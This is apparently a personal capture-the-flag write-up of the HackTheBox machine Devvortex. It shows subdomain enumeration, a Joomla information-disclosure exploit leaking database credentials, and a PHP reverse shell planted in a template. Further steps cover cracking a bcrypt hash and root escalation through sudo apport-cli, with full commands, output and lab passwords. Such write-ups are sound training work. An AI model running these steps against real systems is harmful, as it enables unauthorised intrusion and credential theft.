# **Devvortex Walkthrough (HTB)**  Hello folks, I'm Abzee a n00b trying to be the best one day. I decided to kick-start 2024 by rooting Devvortex on HackTheBox platform and it was really fun to play with and learnt a few things. **Enumeration** Let start with a simple nmap scan to check all open ports on the given IP with this simple command. ``` ┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex] └─$ nmap -sC -sV --min-rate 2000 -oA nmap 10.10.11.242 Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 17:48 WAT Nmap scan report for devvortex.htb (10.10.11.242) Host is up (0.67s latency). Not shown: 722 filtered tcp ports (no-response), 277 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds ``` We have two open port which is HTTP and SSH. Let see what we have on port 80 and get to the juicy part. ``` ┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex] └─$ http 10.10.11.242 HTTP/1.1 302 Moved Temporarily Connection: keep-alive Content-Length: 154 Content-Type: text/html Date: Mon, 01 Jan 2024 16:33:10 GMT Location: http://devvortex.htb/ Server: nginx/1.18.0 (Ubuntu) <html> <head><title>302 Found</title></head> <body> <center><h1>302 Found</h1></center> <hr><center>nginx/1.18.0 (Ubuntu)</center> </body> </html> ``` We have a domain in which we have to add to our host to access the webpage. <code> sudo gedit /etc/hosts </code> Now we are good to go, They shouldn't be any prob accessing the webpage since what we need as already been added.  A nice webpage to dive into but unfortunately couldn't get anything from it then I move on to scan for subdomain using FFUF. ``` ┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex] └─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.5.0 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://devvortex.htb :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.devvortex.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 :: Filter : Response size: 154 ________________________________________________ dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 1882ms] ``` ohh nice, with this we can surely get one two things to exploit and get a foothole but first of let visit the subdomain we just got from our scan.  It running JOOMLA CMS which is vulnerable to Unauthenticated information disclosure (CVE-2023-23752). <code> Link to exploit: https://www.exploit-db.com/exploits/51334 </code>code ``` ┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex] └─$ ruby exploit.rb http://dev.devvortex.htb Users [649] lewis (lewis) - lewis@devvortex.htb - Super Users [650] logan paul (logan) - logan@devvortex.htb - Registered Site info Site name: Development Editor: tinymce Captcha: 0 Access: 1 Debug status: false Database info DB type: mysqli DB host: localhost DB user: lewis DB password: P4ntherg0t1n5r3c0n## DB name: joomla DB prefix: sd4fg_ DB encryption 0 ``` Boom!! having some juicy user and pass it cool, Time to test them out by visiting the administrator login page.  And we are in by trying this credentials. ``` User:lewis Pass:P4ntherg0t1n5r3c0n## ``` **Foothold** Since we are in we can proceed by selecting system then under site templates there should should be a template that we can edit.  The index.php can't be edited because of the permission given to it then I decided to edit the offline.php instead by replacing it with my php shell payload then saved it and start my listener. After then by accessing ```http://dev.devvortex.htb/templates/cassiopeia/offline.php``` and boom we receive a connection back. ``` ┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex] └─$ rlwrap nc -nvlp 1337 listening on [any] 1337 ... connect to [10.10.14.124] from (UNKNOWN) [10.10.11.242] 40618 Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux 17:43:46 up 24 min, 1 user, load average: 2.49, 0.87, 0.51 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT logan pts/1 10.10.14.105 17:34 1:09 2:23 1:07 dd if=/dev/zero of=/dev/null uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@devvortex:/$ zsh: suspended rlwrap nc -nvlp 1337 ┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex] └─$ stty raw -echo;fg [1] + continued rlwrap nc -nvlp 1337 www-data@devvortex:/$ stty rows 21 cols 120 stty rows 21 cols 120 www-data@devvortex:/$ export TERM=xterm-256color export TERM=xterm-256color www-data@devvortex:/$ ``` Got in as www-data but not a problem. Time to read the content of user.txt ``` www-data@devvortex:/$ cd /home cd /home www-data@devvortex:/home$ ls -la ls -la total 12 drwxr-xr-x 3 root root 4096 Sep 26 19:16 . drwxr-xr-x 19 root root 4096 Oct 26 15:12 .. drwxr-xr-x 3 logan logan 4096 Jan 1 17:48 logan www-data@devvortex:/home$ cd logan cd logan www-data@devvortex:/home/logan$ ls -la ls -la total 32 drwxr-xr-x 3 logan logan 4096 Jan 1 17:48 . drwxr-xr-x 3 root root 4096 Sep 26 19:16 .. lrwxrwxrwx 1 root root 9 Oct 26 14:58 .bash_history -> /dev/null -rw-r--r-- 1 logan logan 220 Sep 26 19:16 .bash_logout -rw-r--r-- 1 logan logan 3771 Sep 26 19:16 .bashrc drwx------ 2 logan logan 4096 Oct 26 15:12 .cache -rw-r--r-- 1 logan logan 807 Sep 26 19:16 .profile -rw-rw-r-- 1 logan logan 199 Jan 1 17:48 panic.c -rw-r----- 1 root logan 33 Jan 1 17:19 user.txt www-data@devvortex:/home/logan$ cat user.txt cat user.txt cat: user.txt: Permission denied www-data@devvortex:/home/logan$ ``` We don't have permission to read user.txt unless we are user logan so let move around for a possible credential.  Mysql credentials to try out.  A hash to crack, This is where JohnTheRipper comes in. ``` ┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex] └─$ hashid hash --File 'hash'-- Analyzing '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' [+] Blowfish(OpenBSD) [+] Woltlab Burning Board 4.x [+] bcrypt --End of file 'hash'-- ┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex] └─$ john --wordlist=/opt/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) No password hashes left to crack (see FAQ) ┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex] └─$ john --show hash ?:tequieromucho 1 password hash cracked, 0 left ``` John to the rescue and we found ourself a password, let try them on ssh. ``` User:logan Pass:tequieromucho ┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex] └─$ ssh logan@10.10.11.242 logan@10.10.11.242's password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information disabled due to load higher than 2.0 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. https://ubuntu.com/engage/secure-kubernetes-at-the-edge Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Jan 1 18:03:20 2024 from 10.10.14.105 logan@devvortex:~$ ls panic.c user.txt logan@devvortex:~$ cat user.txt 099c4620c4cbac6b4423a27f5456eecf logan@devvortex:~$ whoami logan logan@devvortex:~$ ``` *Privilege Escalation* The wait is over time to owned system cos that is the sweetest thing ever. First of all let see what we have in sudo -l. ``` logan@devvortex:~$ sudo -l [sudo] password for logan: Matching Defaults entries for logan on devvortex: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User logan may run the following commands on devvortex: (ALL : ALL) /usr/bin/apport-cli logan@devvortex:~$ ``` This vulnerability is privilege escalation in apport-cli 2.26.0 (CVE-2023–1326).  Let see how we can use it to gain system.  running ```sudo /usr/bin/apport-cli -f``` will bring out some options then select 1 after then 3 which will bring another options, this time it not numbers but alphabet so it will be V this time to select after that it !/bin/bash and boom we are system. ``` Please reproduce the crash and collect a backtrace. See https://wiki.ubuntu.com/X/Backtracing for directions. Press any key to continue... ..dpkg-query: no packages found matching xorg .................... *** Send problem report to the developers? After the problem report has been sent, please fill out the form in the automatically opened web browser. What would you like to do? Your options are: S: Send report (1.5 KB) V: View report K: Keep report file for sending later or copying to somewhere else I: Cancel and ignore future crashes of this program version C: Cancel Please choose (S/V/K/I/C): V root@devvortex:/home/logan# whoami root root@devvortex:/home/logan# cat /root/root.txt;hostname ad22b7bb92bc869a4feb2511ed328110 devvortex root@devvortex:/home/logan# ``` This is all for today and thanks for reading.